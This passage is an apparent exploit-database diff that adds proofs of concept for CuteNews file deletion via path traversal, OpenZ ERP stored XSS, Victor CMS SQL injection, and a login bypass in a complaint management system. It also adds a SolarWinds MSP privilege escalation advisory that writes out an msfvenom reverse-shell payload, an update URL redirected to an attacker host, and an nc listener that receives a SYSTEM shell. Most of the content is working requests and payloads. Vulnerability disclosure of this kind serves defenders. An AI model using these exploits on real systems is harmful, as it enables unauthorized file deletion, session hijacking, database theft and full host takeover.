+# Version: v2.1.2 (Maybe it affect other versions)
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+# Remotely: Yes
+
+Description:
+------------------------------------------------------------------------
+In the "Media Manager" area, users can do arbitrarily file deletion.
+Because the developer did not use the unlink() function as secure. So, can
+be triggered this vulnerability by a low user account
+
+
+Arbitrary File Deletion PoC
+--------------------------------------------------------------------------------
+
+POST /cute/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 **********************************
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 222
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/cute/index.php
+Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022
+Upgrade-Insecure-Requests: 1
+
+mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete
\ No newline at end of file
diff --git a/exploits/php/webapps/48450.txt b/exploits/php/webapps/48450.txt
new file mode 100644
index 000000000..9f64de59e
--- /dev/null
+++ b/exploits/php/webapps/48450.txt
@@ -0,0 +1,192 @@
+# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
+# Date: 2020-05-11
+# Exploit Author: Vulnerability-Lab
+# Vendor: https://www.openz.de/
+# https://www.openz.de/download.html
+
+Document Title:
+===============
+OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2234
+
+
+Common Vulnerability Scoring System:
+====================================
+4.6
+
+
+Product & Service Introduction:
+===============================
+https://www.openz.de/
+https://www.openz.de/download.html
+
+
+Affected Product(s):
+====================
+OpenZ
+Product: OpenZ v3.6.60 - ERP (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-06: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent cross site scripting web vulnerability has been discovered
+in the official OpenZ v3.6.60 ERP web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `inpname` and
+`inpdescripción` parameters of the `Employee` add/register/edit
+module in the `menu.html` file. Remote attackers with low privileges are
+able to inject own malicious persistent script code as
+name or description. The injected code can be used to attack the
+frontend or backend of the web-application. The request method
+to inject is POST and the attack vector is located on the
+application-side. The attack can be triggered from low privilege user
+accounts against higher privilege user accounts like manager or
+administrators to elevate privileges via session hijacking.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Employee
+
+Vulnerable Input(s):
+[+] Mitarbeiter Name
+[+] Beschreibung
+
+Vulnerable File(s):
+[+] Menu.html
+
+Vulnerable Parameter(s):
+[+] inpname
+[+] inpdescription
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the openz web-application
+2. Register, add or edit via profile settings the inpname &
+inpdescription parameter inputs
+3. Edit inpname & inpdescription parameter of the profile and save the entry
+Note: The execute occurs on preview of the user credentials in the
+/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
+4. Successful reproduce of the persistent web vulnerability!
+
+
+
+--- POC Session Logs [POST] --- (Inject via Add / Edit)
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
+Host: localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1464
+Origin: https://localhost:8080
+Connection: keep-alive
+Referer:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
+Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
+_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
+Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=&
+inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=&
+inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=&
+inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F&
+inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/
+EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B&
+inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=&
+inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=&
+inpvalue=325235&inpname=>">&
+inpdescription=>">&inpimageurl=31337&
+inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=&
+inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=&
+inpcity=&inpcreated=26-04-2020
+17:03:35&inpcreatedby=Service&inpupdated=26-04-2020
+17:03:35&inpupdatedby=Service
+-
+POST: HTTP/1.1 302 Found
+Server: Apache/2.4.38 (Debian)
+Location:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+- (Execution in Listing)
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source
+Host: myerponline.de
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
+Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
+_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Debian)
+Content-Type: text/html;charset=utf-8
+Content-Language: en
+Content-Length: 1110
+Keep-Alive: timeout=5, max=97
+Connection: Keep-Alive
+
+
+PoC: Vulnerable Source (/security/Menu.html)
+
+
+
+
+
+
+
+
+
+
Business Partner:
+
325235 -
+>">
+
+
+
+Reference(s):
+https://localhost:8080/
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48451.txt b/exploits/php/webapps/48451.txt
new file mode 100644
index 000000000..43687ce6e
--- /dev/null
+++ b/exploits/php/webapps/48451.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Victor CMS 1.0 - 'post' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-09
+# Exploit Author: BKpatron
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+# The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page.
+# vulnerable file : post.php
+http://localhost/CMSsite-master/post.php?post=1
+
+
+Parameter: post (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: post=1 AND 2333=2333
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 7 columns
+ Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU
+
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+# Proof of Concept:
+http://localhost/CMSsite-master/post.php?post=sqli
+
+http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
+
+GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
\ No newline at end of file
diff --git a/exploits/php/webapps/48452.txt b/exploits/php/webapps/48452.txt
new file mode 100644
index 000000000..8d093d16f
--- /dev/null
+++ b/exploits/php/webapps/48452.txt
@@ -0,0 +1,29 @@
+# Exploit Title: complaint management system 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-05-10
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/Complaint%20Management%20System/admin/
+
+POST /Complaint%20Management%20System/admin/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Referer: http://localhost/Complaint%20Management%20System/admin/
+Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
\ No newline at end of file
diff --git a/exploits/windows/local/48448.txt b/exploits/windows/local/48448.txt
new file mode 100644
index 000000000..afc3f6f4b
--- /dev/null
+++ b/exploits/windows/local/48448.txt
@@ -0,0 +1,166 @@
+# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
+# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+# Date: 2020-05-06
+# Vendor: https://www.solarwindsmsp.com/
+# CVE: CVE-2020-1260
+# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
+# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
+# CWE: 276
+
+Vulnerable version
+==================
+SolarWinds MSP PME (Patch Management Engine) before 1.1.15
+
+Timeline
+========
+2020-04-24 Vulnerability discovered
+2020-04-27 Send details to SolarWinds PSIRT
+2020-04-27 SolarWinds confirmed the vulnerability
+2020-05-05 SolarWinds released PME version 1.1.15
+2020-05-06 Public disclosure
+
+Description
+===========
+An error with insecure file permissions has occurred in the SolarWinds
+MSP Cache Service, which is part of the Advanced Monitoring Agent and
+can lead to code execution. The SolarWinds MSP Cache Service is
+typically used to get new update definition files and versions for
+ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
+XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
+MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
+that the parameter SISServerURL can be changed, which controls the
+location of the updates. After some analysis, we were able to provide
+modified XML files (PMESetup_details.xml and
+ThirdPartyPatch_details.xml) that point to an executable file with a
+reverse TCP payload using our controlled SISServerURL web server for
+SolarWinds MSP Cache Service.
+
+Proof of Concept (PoC)
+======================
+As we can see, NTFS change permissions are set to CacheService.xml by
+default. Any user on the system who is in group users can change the
+file content. This is especially a big problem on terminal servers or
+multi-user systems.
+
+PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
+icacls .\CacheService.xml
+.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
+NT-AUTORITÄT\SYSTEM:(I)(F)
+VORDEFINIERT\Administratoren:(I)(F)
+
+1. Modify CacheService.xml
+
+In the xml file, the parameter SISServerURL was adjusted, which now
+points to a web server controlled by the attacker.
+
+
+
+True
+1.1.14.2223
+C:\ProgramData\SolarWinds
+MSP\SolarWinds.MSP.CacheService\cache
+10240
+https://evil-attacker.example.org
+5
+
+AQAAANCMnd8BFdER(...)
+
+
+
+RMM
+True
+1
+300
+1
+
+
+2. Payload creation
+
+Generate an executable file, for example using msfvenom, that
+establishes a reverse tcp connection to the attacker and store it on the
+web server.
+
+msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
+exe > /tmp/solarwinds-shell.exe
+
+3. Prepare web server
+
+Place the modified xml files (PMESetup_details.xml or
+ThirdPartyPatch_details.xml) on the web server in the path
+/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
+executable, set correct values for SizeInBytes and increase the version.
+
+Example of PMESetup_details.xml
+
+
+Patch Management Engine
+Patch Management Engine
+7a4a78b105a1d750bc5dfe1151fb70e1
+3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac
+
+80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
+
+7168
+/ComponentData/RMM/1/solarwinds-shell.exe
+solarwinds-shell.exe
+x86,x64
+all
+1.1.14.2224
+
+
+Example of ThirdPartyPatch_details.xml
+
+
+Third Party Patch
+
+Third Party Patch application for Patch Management Engine RMM v 1 and later
+
+7a4a78b105a1d750bc5dfe1151fb70e1
+3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac
+
+80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
+
+7168
+/ComponentData/RMM/1/solarwinds-shell.exe
+solarwinds-shell.exe
+x86,x64
+all
+1.2.1.95
+
+
+4. Malicious executable download
+
+After restarting the system or reloading the CacheService.xml, the
+service connects to the web server controlled by the attacker and
+downloads the executable file. This is then stored in the path
+%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
+%PROGRAMDATA%\SolarWinds MSP\PME\archives\.
+
+[24/Apr/2020:10:57:01 +0200] "HEAD
+/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
+[24/Apr/2020:10:57:01 +0200] "GET
+/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
+
+5. Getting shell
+
+After a certain time the executable file is executed by SolarWinds MSP
+RPC Server service and establishes a connection with the rights of the
+system user to the attacker.
+
+[~]: nc -nlvp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
+Microsoft Windows [Version 10.0.18363.778]
+(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt-authority\system
+
+C:\WINDOWS\system32>
+
+Fix
+===
+There is a new PME version 1.1.15 which comes with auto-update
+https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 34f4a6cc6..8deb08b13 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11069,6 +11069,7 @@ id,file,description,date,author,type,platform,port
48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
+48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42674,3 +42675,13 @@ id,file,description,date,author,type,platform,port
48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,
+48442,exploits/linux/webapps/48442.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution",2020-05-10,"Nick Frichette",webapps,linux,
+48443,exploits/linux/webapps/48443.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation",2020-05-10,"Nick Frichette",webapps,linux,
+48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,
+48445,exploits/aspx/webapps/48445.txt,"Kartris 1.6 - Arbitrary File Upload",2020-05-11,"Nhat Ha",webapps,aspx,
+48446,exploits/php/webapps/48446.txt,"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
+48447,exploits/php/webapps/48447.txt,"CuteNews 2.1.2 - Arbitrary File Deletion",2020-05-11,Besim,webapps,php,
+48450,exploits/php/webapps/48450.txt,"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
+48451,exploits/php/webapps/48451.txt,"Victor CMS 1.0 - 'post' SQL Injection",2020-05-11,BKpatron,webapps,php,
+48452,exploits/php/webapps/48452.txt,"Complaint Management System 1.0 - Authentication Bypass",2020-05-11,BKpatron,webapps,php,
+48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,